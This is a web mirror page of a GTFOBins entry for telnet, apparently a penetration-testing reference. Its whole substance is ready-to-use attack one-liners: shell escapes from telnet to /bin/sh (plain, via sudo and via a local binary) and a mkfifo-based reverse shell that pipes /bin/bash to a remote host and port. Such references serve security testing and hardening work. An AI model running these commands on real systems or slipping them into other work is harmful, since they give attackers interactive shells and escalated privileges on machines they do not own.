This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-10 09:21:34 +01:00
Code
Issues
b81e57005a
GTFOBins.github.io
/
_gtfobins
/
telnet.md
Emilio Pinna
b81e57005a
First commit
2018-05-21 20:14:41 +01:00
699 B
Raw
Blame
History
functions
exec-interactive
reverse-shell
sudo-enabled
suid-limited
code
description
RHOST=www.google.com RPORT=80 telnet $RHOST $RPORT ^] !/bin/sh
MacOS only.
code
RHOST=127.0.0.1 RPORT=8000 TF=$(mktemp) rm $TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
code
description
RHOST=www.google.com RPORT=80 sudo telnet $RHOST $RPORT ^] !/bin/sh
MacOS only.
code
description
RHOST=www.google.com RPORT=80 ./telnet $RHOST $RPORT ^] !/bin/sh
MacOS only.